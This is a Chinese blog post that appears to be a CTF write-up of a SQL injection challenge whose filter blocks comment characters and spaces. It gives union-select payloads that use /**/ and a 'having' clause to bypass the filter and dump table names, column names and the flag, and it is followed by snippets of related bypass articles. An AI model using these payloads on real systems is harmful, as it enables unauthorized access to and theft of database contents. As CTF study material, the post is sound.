记一次过滤注释符的sql注入

最新推荐文章于 2024-04-20 12:00:00 发布
最新推荐文章于 2024-04-20 12:00:00 发布
阅读量1.3k 收藏
点赞数
分类专栏: 刷题记录 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Little_jcak/article/details/123832460
版权

写在前面:这个是一个很简单的联合注入,但是因为我对于这种通过输入来闭合,从而实现注入不是很熟悉,因此记录一下

1、fuzz测试

发现会给出过滤的字段

black_list is /if|and|\s|#|--/i

不能通过注释掉后面的内容来闭合,所以这里要通过 '构造闭合

1'or'1'='1测试有提示,说明闭合成功
在这里插入图片描述

2、联合注入

爆表名

username='/**/union/**/select/**/concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/having'1'='1

爆列名

username=username='/**/union/**/select/**/concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'/**/having'1'='1

爆字段名

username='/**/union/**/select/**/group_concat(flag)/**/from/**/flag/**/having'1'='1

这里有两个坑

  • 没有用having,语句一直无法执行成功,这个地方目前还没理解透彻
  • 没有弄清楚concat函数group_concat函数
    concat和group_concat都是用在sql语句中做拼接使用的,但是两者使用的方式不尽相同,concat是针对以行数据做的拼接,而group_concat是针对列做的数据拼接,且group_concat自动生成逗号
Y3pro
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
1.实验吧——sql注入1(flag,到底过滤了什么东西? )
qwsn
11-08 3654
0x01:题目 实验吧——sql注入1网址 题目 http://ctf5.shiyanbar.com/423/web/ flag,到底过滤了什么东西? 0x02:WP复现 1.正常访问: http://ctf5.shiyanbar.com/423/web/ #如下图所示 2.输入单引号'测试: 在输入框里输入:' #如图所示,为GET型注入+字注入 http:/...
防止xss和sql注入:JS特殊字过滤正则
10-27
对于SQL注入,JavaScript层面的过滤并不足够,因为SQL注入主要发生在服务器端。在服务器端,应当使用预编译的SQL语句(如PHP的PDO或Node.js的mysql模块),或者使用参数化查询,确保即使输入包含恶意SQL片段,也不会...
SQL注入 Less23(过滤注释)
开心星人的博客
07-24 1582
先去掉左右两边各一个单引号,相当于语文中的引用。因为过滤注释,我们可以手动闭合后面的单引号。尝试使用union注入,因为是有回显点的。想使用报错注入的,因为是会有报错信息的。直接使用union,来逐个测试字段数。很明显知道是单引号闭合。这部分,导致语句出错了。...
sql注入(三)绕过方法及防御手段
最新发布
wangluoanquan111的博客
04-20 1163
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
sql注释注入防御_SQL注入(过滤空格和--+等注释)
weixin_29022821的博客
01-13 608
1、地址:http://ctf5.shiyanbar.com/web/index_2.php(过滤了空格和--+等注释)思路:确定注入参数值类型,直接输入单引号,根据报错信息确定参数值类型为字型,如下图所示。2、正常思路输入‘ or ‘1‘=‘1,直接报错,信息为SQLi detected!,首先猜测or被过滤,直接去掉or,继续输入‘ ‘1‘=‘1,仍然报错,信息为SQLi detected...
php将注释过滤 如何注入,SQL注入(过滤空格和--+等注释)
weixin_35995377的博客
04-08 317
1、地址:http://ctf5.shiyanbar.com/web/index_2.php(过滤了空格和--+等注释)思路:确定注入参数值类型,直接输入单引号,根据报错信息确定参数值类型为字型,如下图所示。2、正常思路输入‘ or ‘1‘=‘1,直接报错,信息为SQLi detected!,首先猜测or被过滤,直接去掉or,继续输入‘ ‘1‘=‘1,仍然报错,信息为SQLi detected...
SQL注入 Less26(过滤空格和注释,使用不带空格的报错注入)
开心星人的博客
07-26 936
由于Windows下无法使用一些特殊字来替换空格,Linux可以,可以去Linux下尝试。这个问题,之前报错注入也出现过,可能是多出了Limit0,1导致构不成整条语句了。不能够正常的提交给服务器,所以我们必须输入他的url编码。用括号()将每个查询的部分独立开。尝试了一下,发现绕过不了空格。前后都必须要有空格,所以使用。%26是&的url编码。...
sql注入讲解ppt.pptx
08-10
一、SQL 注入的特点: 1. 广泛性:SQL 注入可以发生在各种 web 应用程序中,无论是使用哪种编程语言或数据库管理系统。 2. 隐蔽性:SQL 注入攻击往往是隐蔽的,很难被发现,需要具备专业的安全知识和经验来检测和...
分享一个简单的sql注入
12-16
SQL注入是一种常见的网络安全威胁,它主要针对使用SQL(结构化查询语言)的数据库系统。攻击者通过在网页表单、URL参数或其他用户输入点输入恶意的SQL代码,以欺骗服务器执行非授权的操作,从而获取敏感信息、篡改...
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAF(Web Application Firewall)的常见特征是指其具有审计...
第一节 SQL注入的原理-01
09-15
SQL注入是一种常见的Web应用安全漏洞,发生在Web应用程序使用用户输入数据构造SQL语句时,没有正确地对用户输入进行过滤和转义,导致攻击者可以 inject 恶意SQL代码,访问、修改或控制敏感数据。 解释型语言和编译...
sqli-labs(十)(过滤注释
weixin_30847939的博客
08-29 135
第二十三关: 这关还是一个GET型、字串、单引号、的有报错的sql注入,输入?id=1' ,页面会报错 我们继续按照之前的套路来,先输入?id=1' or '1'='1 页面正常显示,说明这个地方又很有可能存在sql注入。继续输入?id=1' or '1'='1' %23 发现页面居然报错,从报错信息中发现我们的注释居然没了,说明后台对注释中做了过滤。 像这种情况...
SQL注入】靶场SQLI DUMB SERIES-26空格和注释过滤
开水的博客
02-22 292
我们输入的第一个单引号和前面的单引号闭合,第二个单引号和后面的单引号闭合。26题提示所有的空格和注释都会被过滤掉。是我们输入进去的字
sql注入中的过滤问题
csjjjd的博客
01-27 431
在这个语句中,**/被用作注释号,是一种可以跨行注释注释。它将后续的内容都注释掉,从而避免了一些输入过滤注入过滤,可以进行SQL注入从而获取数据或进行其他恶意操作。id=1 or 1=1#时提示错误,从这里可以看出对面过滤了点什么导致我的语句出错了,因为我这个语句是用真的,不管放在哪都是会一定正确的,但是这里提示错误的。顺带一提:看来大佬wp后发现其实过滤空格还可以使用()括号来绕过,但是我觉得还是/**/用的习惯,希望本文能够帮助大家。4.直接拿到flag。
SQL注入过滤的绕过
谢公子的博客
07-26 5199
在实际的项目开发中,程序猿一般都会使用函数过滤一些字,以达到防止SQL注入。譬如,下面的php代码使用 preg_replace函数过滤了一些字 preg_replace('A' , 'B' , C):执行一个正则表达式的搜索和替换,这个的意思是搜索C中合A的部分,然后用B来代替。 有关这个函数更多的详情:preg_replace函数详解 过滤了字我们就注入不了了吗?no ,...
sql注释注入防御_SQL注入ByPass的一些小技巧
weixin_42395462的博客
12-30 288
SQL注入Bypass技巧注入点识别SQL注入的第一步就是失识别注入点,一般都是在参数后面简单的and 1=1和and 1=2等来判断是否有注入点或者是否有WAF拦截,如果简单的and 1=1这种被WAF拦截了,可以使用如下方法绕过:使用这些字进行注入点识别:+,-,*,%,/,<>,||,|,&,&&,也可以将and换成or,&&,||等也...
mysql 注释 绕过_SQL注入绕过方法
weixin_39557087的博客
01-27 749
1.注释绕过--注释内容#注释内容/*注释内容*/;2.大小写绕过常用与waf的正则对大小写不敏感的情况下例:waf过滤了关键字select,可以用Select绕过过滤3.内联注释绕过内联注释就是把一些特有的仅在MySQL上的语句放在/*!...*/中,这些语句如果在其它数据库中不会被执行,但在MySQL中会执行4.双写关键字绕过在某一些简单的waf,将关键字select等只使用replace(...
SQL注入一些过滤及绕过总结
热门推荐
weixin_44300286的博客
07-20 1万+
前言: 前几天做了几道SQL注入的题,一上去就遇到这样那样的过滤,弄得我很难受,所以这里写一篇关于过滤一些的总结。 1、过滤关键字 过滤关键字应该是最常见的过滤了,因为只要把关键字一过滤,你的注入语句基本就不起作用了。 绕过方法: (1)最常用的绕过方法就是用/**/,<>,分割关键字 sel<>ect sel/**/ect (2)根据过滤程度,有时候还可以用双写绕过 s...
sql注入过滤与绕过
designer545的博客
07-13 1132
在一些网站,管理员会通过一些正则表达式来使过滤一些语句 此时,就要通过一些绕过方法来绕过过滤进行查询。 一、通过注释绕过 注释 # // 通过在关键词的中间加入注释,使关键词不被识别 如 select 改为 se//lect 二、通过<>绕过 如 select 改为 sel<>ect 三、通过改变大小写绕过 四、如果and or被过滤 可以将and 用&& 替换 or 用 || 替换 五、通过重复关键词绕过 六、通过url编码绕过 七、等价函数与命令
sql注入注释过滤
11-09
但是,如果注释过滤,那么攻击者就无法使用注释进行SQL注入攻击。\n\在引用和引用中,都提到了SQL注入中的注释过滤的情况。在这种情况下,攻击者无法使用注释进行SQL注入攻击,但是仍然有其他的方式可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值